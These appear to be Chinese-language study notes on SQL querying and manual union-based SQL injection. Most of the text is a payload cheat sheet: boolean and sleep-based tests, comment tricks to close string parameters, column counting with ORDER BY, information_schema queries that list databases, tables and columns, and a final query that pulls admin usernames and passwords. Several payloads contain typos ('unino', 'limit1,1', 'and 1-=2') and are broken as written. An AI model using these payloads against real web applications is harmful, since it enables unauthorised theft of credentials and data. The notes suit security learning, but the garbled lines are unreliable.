select * from test
查看test库的内容
select * from test where id=1
查询id=1 的内容
select * from test where id =1 and username ='admin'
两者都需满足才能查询
select * from test order by 1
通过第一列进行排序
select * from test order by age
通过年龄进行排序
select * from test limit 0,1
从第一行开始显示一行,
select * from test union select *from bigfish
前后的列数需要相同
select * from test union select *,1 from bigfish
若不相同要补齐。
select * from test union select 1,2,3,database();
查询库名
数字型
and 1=1
and 1=2
and sleep(5)
字符型(要考虑闭合)
'and 1=1 %23(#)
'and 1=1 -- asd(-- 空格)
'and 1=1 -- (+会被转换为空格)
页面进行判断列数(使用二分法比较好一点)
id =1 order by 1 正常说明存在第一列,以此类推 order by 2..........
判断回显点
id =1 union select 1,2 database()
可能查询不到,是因为页面满了,
id =1 and 1=2 union select 1,database()
让前面的页面不能输出,可查询后面的
id =1.999 union select 1,database()
同样我们也可以写一个不存在的id,来显示出后面
查询数据库版本
and 1=2 union select 1,version()
猜讯数据库
and 1=2 union select 1,schema_name from information_schema.schemata limit 0,1
猜讯表名
and 1=2 union select 1,table_name from information_schema.tables where table_schema=database() limit1,1
and 1-=2 union select 1,table_name from information_schema.tables where table_Schema="库名" limit 1,1
查询字段名
and 1=2 union select 1,column_name from information_schema.columns where table_schema=database()and table_name='admin' limit 0,1
查询字段内容
and 1=2, union select 1,username from admin
查库: select schema_name from information_schema.schemata
查表:select table_name from information_schema.tables where table_schema='security'
查列:select column_name from information_schema.columns where table_name='users'
查字段:select username,password from security.users
id=1 and exists(select * from admin)
exists()判断是否有内容,可判断这个表是否存在,然后在将* 改变为具体字段如password来判断是否有这个字段名
id=1 unino select 1,2,3,4,5,username,password,8 from admin
